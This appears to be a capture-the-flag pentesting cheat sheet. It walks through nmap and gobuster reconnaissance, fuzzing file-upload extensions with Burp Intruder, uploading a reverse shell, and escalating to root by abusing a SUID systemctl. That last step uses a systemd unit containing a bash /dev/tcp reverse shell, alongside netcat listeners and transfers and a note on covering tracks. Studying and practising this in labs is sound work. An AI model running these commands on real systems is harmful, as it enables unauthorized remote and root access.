Generally not required with box pwning as the information are in front of our eyes.
See What is Reconnaissance/Footprinting for more information.
Port Scanning with
One of the first step of a pentesting is “reconnaissance” or finding information regarding the target. To gather information about the target machine, one can use
nmap, a free, open-source and powerful tool used to discover hosts and services on a computer network.
A first step toward that would be to use the following command:
nmap -sV <target_ip>
Often Used Flags
| nmap flag | Description | |===========|=====================================================================================| | -sV | Attempts to determine the version of the services running | | -p |
<x> or -p- Port scan for port
<x> or scan all ports | | -Pn | Disable host discovery and just scan for open ports | | -A | Enables OS and version detection, executes in-build scripts for further enumeration | | -sC | Scan with the default nmap scripts | | -v | Verbose mode | | -sU | UDP port scan | | -sS | TCP SYN port scan |
OWASP DirBuster is often used to brute force your way to a list of often used directory names. We will, however, use GoBuster which is a similar but modern and fast tool written in Go.
It is available to download on Kali Linux 2020.1+:
sudo apt-get install gobuster or on GitHub.
gobuster dir -u http://<ip>:<port> -w <word_list_location>
Note: On Kali Linux, word lists are under
/usr/share/wordlists. For a quick brute force,
directory-list-2.3-small.txt is a good start.
Often Used Flags
| GoBuster flag | Description | |=|=========================| | -e | Print the full URLs in your console | | -u | The target URL | | -w | Path to your word list | | -U and -P | Username and Password for Basic Auth | | -p
Fuzz a Page
We can use Burp Suite’s “Intruder” to fuzz a website.
What we want to achieve here is test which file extension is allowed by the website.
First we need to create a list (or use one from the Enterprise edition).
We intercept the
POST request used to upload file and send it to the Intruder tool. Using the “Attack type” called “Sniper”, we add our Payload to the file extension of the request.
On the “Payloads” tab, we add our list. On the “Options” tab we can use the “Grep - Match” feature to flag result items with responses matching an expression (for example “Extension not allowed”). This is helpful to quickly find which extension doesn’t return an error.
Time to start the attack!
Upload a Reverse Shell
Update your IP address and the port to use in the file and upload the file to the website (change file extension if necessary).
Next, use netcat to connect to listen to incoming connections:
nc -lvnp <port_num>
Also called privesc, is the action of gaining access to root on a machine by one mean or another.
Using SUID file is a great way to gain privesc. To find SUID files, type:
find / -perm -u=s -type f 2>/dev/null
This show every SUID file type owned by root user on root file system and below.
stderr (standard error) is redirected to
/dev/null to prevent errors from polluting the results.
Let’s say we found binary
systemctl with SUID.
systemctl is used to start, stop and generally manage services. For this reason it’s best to let privilege users only be able to use it.
Create the Payload
We can craft a
systemd unit file which execute a payload as root user:
[Unit] Description=Open a shell with root [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<client_ip>/<port_1> 0>&1' [Install] WantedBy=multi-user.target
User is important to let
systemd we want to execute as root. Here,
ExecStart is a simple one-line bash reverse shell.
<port> is the port we will use to connect later.
Upload the Payload
Next, we need to upload that payload to our server (or write it as a one liner). Once again we can use netcat for this task. On the target machine (i.e. through our reverse proxy):
nc -vl <port_2> > /tmp/rootshell.service
/tmp as it should be writable even to non root user.
From our client machine, we send the file:
nc -n <target_ip> <port_2> < rootshell.service
Connect to the Host and Gain Privesc
This is getting confusing but we need another netcat session to listen to the root shell:
nc -lvnp <port_1>
On the target machine (through the first reverse proxy) execute the payload using
systemctl enable /tmp/rootshell.service systemctl start rootshell.service
If you get an error like although you have an
The unit files have no [Install] section. They are not meant to be enabled using systemctl.
It’s because old version of
systemctl only loads services from a set of pre-defined paths. Use
systemctl link /tmp/rootshell.service first to allow loading (in later version this is done automatically with
Depending on the system there may be post-exploitation stages. This stage generally involves:
- Pivoting: what other hosts can be targeted
- What additional information can we gather from the host now that we are a privileged user
- Covering your tracks